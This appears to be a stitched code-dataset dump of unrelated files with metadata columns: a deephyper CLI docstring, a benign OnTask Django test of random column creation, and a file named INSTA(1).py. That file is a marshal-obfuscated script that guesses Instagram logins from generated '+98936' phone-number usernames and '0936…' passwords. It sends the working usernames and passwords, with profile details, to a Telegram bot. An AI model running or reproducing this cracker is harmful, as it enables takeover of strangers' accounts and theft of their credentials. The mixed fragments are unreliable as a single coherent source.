"BSD-3-Clause"
] | 50
|
2018-12-11T20:41:41.000Z
|
2022-02-25T19:50:47.000Z
|
"""
* deephyper nas agebo --problem test_agebo_cli.problem --evaluator thread --run-function test_agebo_cli.run --max-evals 100 --timeout 10
* deephyper nas agebo --problem test_agebo_cli.problem --evaluator thread --run-function test_agebo_cli.run --max-evals 100 --timeout 10 --kappa 1.96 --n-jobs 2 --verbose 1
"""
| 53.166667
| 172
| 0.746082
| 50
| 319
| 4.6
| 0.44
| 0.156522
| 0.208696
| 0.208696
| 0.904348
| 0.904348
| 0.904348
| 0.904348
| 0.904348
| 0.904348
| 0
| 0.053191
| 0.115987
| 319
| 6
| 173
| 53.166667
| 0.762411
| 0.971787
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
4b71c2c04af5740722b9505b8e5fe4d424086126
| 9,638
|
py
|
Python
|
INSTA(1).py
|
imharki/im_7aba.
|
059df004453159a7930f79ad26e8c084b004612e
|
[
"MIT"
] | null | null | null |
INSTA(1).py
|
imharki/im_7aba.
|
059df004453159a7930f79ad26e8c084b004612e
|
[
"MIT"
] | null | null | null |
INSTA(1).py
|
imharki/im_7aba.
|
059df004453159a7930f79ad26e8c084b004612e
|
[
"MIT"
] | null | null | null |
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00@\x00\x00\x00s\xb0\x02\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x02l\x05m\x06Z\x06\x01\x00d\x00d\x01l\x05Z\x05d\x00d\x01l\x07Z\x07d\x00d\x01l\x08Z\x08d\x00d\x03l\x08m\tZ\t\x01\x00d\x00d\x04l\nm\x0bZ\x0b\x01\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\nZ\nd\x00d\x01l\x00Z\x00d\x00d\x01l\x0cZ\x0ce\x00\xa0\rd\x05\xa1\x01\x01\x00d\x06Z\x0ed\x07Z\x0fd\x08Z\x10d\x06Z\x11d\x08Z\x12d\tZ\x13d\nZ\x14d\x0bZ\x15d\x0cZ\x16d\rZ\x17d\x0eZ\x18d\x06Z\x19d\x08Z\x12d\tZ\x13d\nZ\x14d\x0bZ\x15d\x0cZ\x16d\x00Z\x1ad\x00Z\x1be\x0c\xa0\x1cd\x0f\xa1\x01Z\x1de\x1ee\x14e\x1d\x17\x00\x83\x01\x01\x00e\x1ed\x10\x83\x01\x01\x00e\x1fe\x17d\x11\x17\x00e\x13\x17\x00\x83\x01Z e\x1fe\x17d\x12\x17\x00e\x13\x17\x00\x83\x01Z!e\x1fe\x17d\x13\x17\x00e\x13\x17\x00\x83\x01Z"e\x1ee\x14d\x10\x17\x00\x83\x01\x01\x00d\x00d\x01l\nZ\ne\n\xa0#\xa1\x00Z$e\n\xa0%d\x14e$\xa1\x02Z&e\x02\xa0\'d\x15e!\x9b\x00d\x16e"\x9b\x00d\x17\x9d\x05\xa1\x01\xa0\x04\xa1\x00Z(e(d\x18\x19\x00d\x19\x19\x00Z)d\x1ad\x1b\x84\x00Z*d\x1cZ+d\x1dd\x1ed\x1fd d!d"d#d$d%d&\x9c\tZ,d\'Z-e 
d(k\x02\x90\x01r\xd6e.d)\xa0/d*d+\x84\x00e0d,\x83\x01D\x00\x83\x01\xa1\x01\x83\x01Z1d-e1\x17\x00Z2d.e1\x17\x00Z3e.e\t\x83\x00\x83\x01Z4e4e3e2e4d/d\x1fd0d1\x9c\x07Z5e\x02j\'e+e,e5d2\x8d\x03Z6d3e6\xa0\x04\xa1\x00v\x00\x90\x02r6e\x1bd47\x00Z\x1be6\xa0\x04\xa1\x00d3\x19\x00d5\x19\x00Z7e*e7e3\x83\x02\x01\x00nrd6e6\xa0\x04\xa1\x00v\x00\x90\x02r^e\x1ee\x10d7\x17\x00e2\x17\x00d8\x17\x00e3\x17\x00\x83\x01\x01\x00nJe\x02\xa0\'d\x15e!\x9b\x00d9e"\x9b\x00d:e)\x9b\x00d;e\x1b\x9b\x00d<e\x1a\x9b\x00d=\x9d\x0b\xa1\x01\x01\x00e\x1ee\x0ed7\x17\x00e2\x17\x00d8\x17\x00e3\x17\x00\x83\x01\x01\x00e\x1ad47\x00Z\x1a\x90\x01q\xa0d\x01S\x00)>\xe9\x00\x00\x00\x00N)\x01\xda\ttoken_hex)\x01\xda\x05uuid4)\x01\xda\x05sleepz\x13https://t.me/VV00VGz\x07\x1b[1;31mz\x07\x1b[1;32mz\x07\x1b[1;33mz\x07\x1b[2;31mz\x07\x1b[2;32mz\x07\x1b[2;39mz\x07\x1b[2;35mz\x07\x1b[2;36mz\x07\x1b[1;34mZ\x03BANu\x96\x00\x00\x00\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xaf\xe2\x8c\xafu\x0f\x00\x00\x00\xe2\x8c\xaf PASSWORD : u\r\x00\x00\x00\xe2\x8c\xaf TOKEN : u\t\x00\x00\x00\xe2\x8c\xaf ID : z\x08%A:%b:%S\xfa\x1chttps://api.telegram.org/bot\xfa\x15/sendMessage?chat_id=u\x13\x00\x00\x00&text=\xe2\x8c\xaf Wait... 
.\xda\x06resultZ\nmessage_idc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x0e\x00\x00\x00C\x00\x00\x00sF\x01\x00\x00t\x00\xa0\x01d\x01\xa1\x01d\x02\x14\x00}\x02d\x03d\x04d\x05d\x06d\x07d\x08d\td\nd\x0bd\x0bd\x0cd\r\x9c\x0b}\x03d\x0e|\x00\x9b\x00d\x0f\x9d\x03}\x04t\x02j\x03|\x04|\x03d\x10\x8d\x02\xa0\x04\xa1\x00}\x05t\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x13\x19\x00\x83\x01}\x06t\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x14\x19\x00\x83\x01}\x07t\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x15\x19\x00d\x16\x19\x00\x83\x01}\x08t\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x17\x19\x00d\x16\x19\x00\x83\x01}\tt\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x18\x19\x00\x83\x01}\nt\x05|\x05d\x11\x19\x00d\x12\x19\x00d\x14\x19\x00\x83\x01}\x0bt\x02\xa0\x03d\x19|\x07\x9b\x00\x9d\x02\xa1\x01}\x0c|\x0c\xa0\x04\xa1\x00}\r|\rd\x1a\x19\x00}\x0et\x06d\x1b|\x06\x9b\x00d\x1c|\x00\x9b\x00d\x1d|\x01\x9b\x00d\x1e|\x08\x9b\x00d\x1f|\t\x9b\x00d |\x0e\x9b\x00d!\x9d\r\x17\x00}\x0fd"t\x07\x9b\x00d#t\x08\x9b\x00d$|\x0f\x9b\x00\x9d\x06}\x10t\x02\xa0\t|\x10\xa1\x01}\x11t\nt\x0b|\x0f\x17\x00\x83\x01\x01\x00d\x00S\x00)%N\xe9\x08\x00\x00\x00\xe9\x02\x00\x00\x00z\x11www.instagram.com\xda\x04TruezmMozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36\xda\x06cookie\xfa\x03*/*z!application/x-www-form-urlencodedZ\x0eXMLHttpRequestZ\x0f936619743392459\xda\x07missingz\x0een-US,en;q=0.9)\x0bZ\x04HOSTZ\tKeepAlivez\nuser-agent\xda\x06Cookie\xda\x06AcceptZ\x0bContentTypez\x10X-Requested-Withz\x0bX-IG-App-IDz\x10X-Instagram-AJAXz\x0bX-CSRFToken\xfa\x0fAccept-Languagez\x1ahttps://www.instagram.com/z\x07/?__a=1)\x01\xda\x07headersZ\x07graphql\xda\x04userZ\tfull_name\xda\x02idZ\x10edge_followed_by\xda\x05countZ\x0bedge_followZ\nis_privatez$https://o7aa.pythonanywhere.com/?id=\xda\x04datau\x80\x00\x00\x00\n\n\xe2\x8c\xaf \xf0\x9d\x90\x8d\xf0\x9d\x90\x84\xf0\x9d\x90\x96 
\xf0\x9d\x90\x80\xf0\x9d\x90\x82\xf0\x9d\x90\x82\xf0\x9d\x90\x8e\xf0\x9d\x90\x94\xf0\x9d\x90\x8d\xf0\x9d\x90\x93 \xf0\x9d\x90\x88\xf0\x9d\x90\x8d\xf0\x9d\x90\x92\xf0\x9d\x90\x93\xf0\x9d\x90\x86\xf0\x9d\x90\x91\xf0\x9d\x90\x80\xf0\x9d\x90\x8c : \n____________________\n\xe2\x8c\xaf \xf0\x9d\x90\x8d\xf0\x9d\x90\x80\xf0\x9d\x90\x8c\xf0\x9d\x90\x84 : u\x1a\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x94\xf0\x9d\x90\x92\xf0\x9d\x90\x84\xf0\x9d\x90\x91 : u*\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x8f\xf0\x9d\x90\x80\xf0\x9d\x90\x92\xf0\x9d\x90\x92\xf0\x9d\x90\x96\xf0\x9d\x90\x8e\xf0\x9d\x90\x91\xf0\x9d\x90\x83 : u.\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\xb9\xf0\x9d\x90\x8e\xf0\x9d\x91\xb3\xf0\x9d\x91\xb3\xf0\x9d\x90\x8e\xf0\x9d\x90\x96\xf0\x9d\x90\x84\xf0\x9d\x90\x91\xf0\x9d\x90\x92 : u.\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\xb9\xf0\x9d\x90\x8e\xf0\x9d\x91\xb3\xf0\x9d\x91\xb3\xf0\x9d\x90\x8e\xf0\x9d\x90\x96\xf0\x9d\x90\x88\xf0\x9d\x90\x8d\xf0\x9d\x90\x86 : u\x1a\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x80\xf0\x9d\x90\x93\xf0\x9d\x90\x80 : u<\x00\x00\x00 .\n_____________________\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x84\xf0\x9d\x90\x95 @VV00VG - @ZX7_M\n r\x05\x00\x00\x00r\x06\x00\x00\x00z\x06&text=)\x0c\xda\x07secretsr\x02\x00\x00\x00\xda\x08requests\xda\x03get\xda\x04json\xda\x03str\xda\x01B\xda\x05token\xda\x02ID\xda\x04post\xda\x05print\xda\x01G)\x12Z\x05userI\xda\x08passwordr\x0b\x00\x00\x00\xda\x04headZ\x06url_idZ\x06req_id\xda\x04namer\x13\x00\x00\x00Z\x08followesZ\tfollowingZ\x03ispZ\x03idd\xda\x02reZ\x03reeZ\x03datr\x15\x00\x00\x00Z\x03tlg\xda\x01i\xa9\x00r&\x00\x00\x00\xda\x00\xda\ncode_EXTRA)\x00\x00\x00s6\x00\x00\x00\x00\x01\x0e\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf7\x06\n\x0c\x01\x12\x01\x14\x01\x14\x01\x18\x01\x18\x01\x14\x01\x14\x01\x10\x01\x08\x01\x08\x01.\x01\x16\x01\n\x01r(\x00\x00\x00z.https://i.instagram.com/api/v1/accounts/login/zqInstagram 113.0.0.39.122 Android (24/5.0; 515dpi; 
1440x2416; huawei/google; Y6 2019 pream; angler; angler; en_US)r\x0c\x00\x00\x00r\r\x00\x00\x00z\rgzip, deflatez\x05en-USz\x083brTvw==Z\x04WIFIz0application/x-www-form-urlencoded; charset=UTF-8z\x0fi.instagram.com)\tz\nUser-Agentr\x0f\x00\x00\x00r\x0e\x00\x00\x00z\x0fAccept-Encodingr\x10\x00\x00\x00z\x11X-IG-Capabilitiesz\x14X-IG-Connection-Typez\x0cContent-TypeZ\x04HostZ\n9087654321Z\x0210r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00c\x00\x00\x00s\x18\x00\x00\x00|\x00]\x10}\x01t\x00\xa0\x01t\x02\xa1\x01V\x00\x01\x00q\x02d\x00S\x00)\x01N)\x03\xda\x06randomZ\x06choicer\x12\x00\x00\x00)\x02\xda\x02.0r%\x00\x00\x00r&\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00\xda\t<genexpr>R\x00\x00\x00\xf3\x00\x00\x00\x00r+\x00\x00\x00\xe9\x07\x00\x00\x00z\x06+98936Z\x040936Z\x05false\xda\x010)\x07\xda\x04uuidr!\x00\x00\x00\xda\x08usernameZ\tdevice_idZ\x08from_regZ\n_csrftokenZ\x14login_attempt_countn)\x02r\x11\x00\x00\x00r\x15\x00\x00\x00Z\x0elogged_in_user\xe9\x01\x00\x00\x00r0\x00\x00\x00z*"message":"challenge_required","challenge"z\x0busername : z\r: password : z\x19/editmessagetext?chat_id=z\x0c&message_id=u&\x00\x00\x00&text=\xe2\x8c\xaf BAN : \n\n\xe2\x8c\xaf \xf0\x9d\x90\x87\xf0\x9d\x90\x88\xf0\x9d\x90\x93 : [u\x16\x00\x00\x00]\n\xe2\x8c\xaf \xf0\x9d\x90\x81\xf0\x9d\x90\x80\xf0\x9d\x90\x83 : [u\x1e\x00\x00\x00] \n\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x84\xf0\x9d\x90\x95 : @VV00VG)8Z\nwebbrowserr)\x00\x00\x00r\x17\x00\x00\x00Z\nuser_agentr\x19\x00\x00\x00r\x16\x00\x00\x00r\x02\x00\x00\x00\xda\x03sysr/\x00\x00\x00r\x03\x00\x00\x00\xda\x04timer\x04\x00\x00\x00Z\x08pyfiglet\xda\x04open\xda\x01Er 
\x00\x00\x00\xda\x01S\xda\x01Z\xda\x01XZ\x02Z1\xda\x01F\xda\x01A\xda\x01Cr\x1b\x00\x00\x00\xda\x01YZ\x02Z2Z\x02aaZ\x02zzZ\rfiglet_formatZ\x03bnrr\x1f\x00\x00\x00\xda\x05inputZ\x03pasr\x1c\x00\x00\x00r\x1d\x00\x00\x00\xda\tlocaltime\xda\x01t\xda\x08strftimeZ\x0ccurrent_timer\x1e\x00\x00\x00Z\tstart_msgZ\x06id_msgr(\x00\x00\x00Z\x03urlr\x11\x00\x00\x00r\x12\x00\x00\x00r\x1a\x00\x00\x00\xda\x04join\xda\x05range\xda\x02usr0\x00\x00\x00r!\x00\x00\x00Z\x03uidr\x15\x00\x00\x00Z\x03reqZ\x05userQr&\x00\x00\x00r&\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\x90\x00\x00\x00(\x01\x0c\x01\x18\x01\x0c\x01\x0c\x01\x18\x01\x08\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\n\x01\x0c\x01\x08\x01\x10\x01\x10\x01\x10\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x1c\x01\x0c\x02\x08\x1d\x04\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf9\x06\x08\x04\x02\n\x01\x1c\x01\x08\x01\x08\x01\n\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x06\x10\x01\x0e\x01\x08\x01\x10\x01\x0c\x01\x0e\x01\x1a\x02*\x01\x18\x01'))
| 4,819
| 9,623
| 0.761776
| 2,096
| 9,638
| 3.468989
| 0.209924
| 0.133682
| 0.094072
| 0.080869
| 0.41246
| 0.371063
| 0.342869
| 0.278229
| 0.246596
| 0.246596
| 0
| 0.312166
| 0.009857
| 9,638
| 2
| 9,623
| 4,819
| 0.449754
| 0
| 0
| 0
| 0
| 2.5
| 0.869074
| 0.547775
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 12
|
298df0662301bcaf3d376143ad91a822f4a8ed82
| 13,848
|
py
|
Python
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 33
|
2017-12-02T04:09:24.000Z
|
2021-11-07T08:41:57.000Z
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 189
|
2017-11-16T04:06:29.000Z
|
2022-03-11T23:35:59.000Z
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 30
|
2017-11-30T03:35:44.000Z
|
2022-01-31T03:08:08.000Z
|
# -*- coding: utf-8 -*-
"""Test column basic operations"""
import json
import os
from django.conf import settings
from django.utils.dateparse import parse_datetime
from rest_framework import status
from ontask import models, tests
from ontask.dataops import pandas
from ontask.column import services
class ColumnAddRandomColumnForm(tests.OnTaskTestCase):
"""Test the creation of random columns."""
fixtures = ['simple_table']
filename = os.path.join(settings.ONTASK_FIXTURE_DIR, 'simple_table.sql')
user_email = 'instructor01@bogus.com'
user_pwd = 'boguspwd'
workflow_name = 'wflow1'
def test_create_random_column_number_form(self):
"""Create a random number column with no values"""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a single integer
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '13.0',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a multiple strings
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': 'one, two, three',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a interval integer
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '-3.0 - -5.0',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'double')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [-3, -4, -5] for element in data_frame[cname]))
# Delete the column
services.delete_column(self.workflow.user, self.workflow, new_column)
# JSON POST request for column creation with an integer list
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '17, 18, 19',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'double')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [17, 18, 19] for element in data_frame[cname]))
def test_create_random_column_string_form(self):
    """Create a random string column through the AJAX form endpoint.

    Phase 1 posts a single category value ('bogus'), which the view
    rejects: the form HTML comes back and no column is created.
    Phase 2 posts a comma-separated category list, which succeeds; the
    new column's cells must all be drawn from that list.
    """
    # Operate on the first workflow of the fixture set.
    self.workflow = models.Workflow.objects.all().first()
    # Column name under test and the column count before the requests.
    col_name = 'random_column'
    initial_ncols = self.workflow.ncols
    # Phase 1: single-value categories are rejected by the form.
    response = self.get_response(
        'column:random_column_add',
        method='POST',
        req_params={
            'name': col_name,
            'data_type': 'string',
            'raw_categories': 'bogus',
            'position': 0},
        is_ajax=True)
    payload = json.loads(response.content)
    self.assertIn('html_form', payload)
    self.assertTrue(status.is_success(response.status_code))
    self.workflow.refresh_from_db()
    self.assertEqual(self.workflow.ncols, initial_ncols)
    self.assertIsNone(self.workflow.columns.filter(name=col_name).first())
    # Phase 2: a comma-separated list of categories creates the column.
    response = self.get_response(
        'column:random_column_add',
        method='POST',
        req_params={
            'name': col_name,
            'data_type': 'string',
            'raw_categories': 'one, two, three',
            'position': 0},
        is_ajax=True)
    payload = json.loads(response.content)
    self.assertNotIn('html_form', payload)
    self.assertTrue(status.is_success(response.status_code))
    self.workflow.refresh_from_db()
    self.assertEqual(self.workflow.ncols, initial_ncols + 1)
    created = self.workflow.columns.filter(name=col_name).first()
    self.assertIsNotNone(created)
    self.assertEqual(created.name, col_name)
    self.assertEqual(created.data_type, 'string')
    data_frame = pandas.load_table(
        self.workflow.get_data_frame_table_name())
    self.assertTrue(all(
        cell in ['one', 'two', 'three']
        for cell in data_frame[col_name]))
def test_create_random_column_boolean_form(self):
"""Create a random boolean column through the AJAX form view."""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# Invalid request: a single category value is rejected; the form HTML
# is returned ('html_form' present) and no column is created.
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# Two comma-separated values are accepted for a boolean column. Every
# generated cell is falsy below -- presumably 'one'/'two' both parse as
# False; TODO confirm against the form's boolean coercion rules.
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'one, two',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'boolean')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
# All generated cells are falsy (see note above).
self.assertTrue(all(not element for element in data_frame[cname]))
# Delete the column so the next request can recreate it under the same
# name without a clash.
services.delete_column(self.workflow.user, self.workflow, new_column)
# Valid request: 'True, False' creates a boolean column whose cells are
# drawn from both truth values.
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'True, False',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'boolean')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [True, False] for element in data_frame[cname]))
def test_create_random_column_datetime_form(self):
"""Create a random datetime column through the AJAX form view."""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with incorrect string value:
# a non-datetime category string is rejected (form returned).
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request with a single datetime value (the original comment
# said "single integer"): also rejected -- apparently a lone datetime
# category is not accepted; TODO confirm against the form validation.
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories': '2020-09-11 12:04:43+0930',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# Valid request: two comma-separated datetimes create the column; the
# expected parsed values are precomputed for the data check below.
dtimes = [
parse_datetime('2020-09-11 12:04:43+0930'),
parse_datetime('2020-09-12 12:04:43+0930')]
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories':
'2020-09-11 12:04:43+0930, 2020-09-12 12:04:43+0930',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'datetime')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
# Every generated cell must be one of the two parsed datetimes.
self.assertTrue(all(
element in dtimes for element in data_frame[cname]))
# Delete the column
services.delete_column(self.workflow.user, self.workflow, new_column)
| 39.008451
| 77
| 0.60998
| 1,601
| 13,848
| 5.083073
| 0.08807
| 0.086999
| 0.047923
| 0.079872
| 0.9232
| 0.920128
| 0.920128
| 0.914721
| 0.914721
| 0.914721
| 0
| 0.013657
| 0.286179
| 13,848
| 354
| 78
| 39.118644
| 0.809611
| 0.094526
| 0
| 0.864769
| 0
| 0.003559
| 0.112624
| 0.026754
| 0
| 0
| 0
| 0
| 0.24911
| 1
| 0.014235
| false
| 0
| 0.02847
| 0
| 0.064057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29f4bab38728e3c2e4ab4f4e8bf8e90b8218b338
| 13,027
|
py
|
Python
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | 3
|
2020-03-09T00:30:20.000Z
|
2021-03-08T22:30:19.000Z
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | 28
|
2020-02-28T17:19:07.000Z
|
2022-03-25T04:59:26.000Z
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
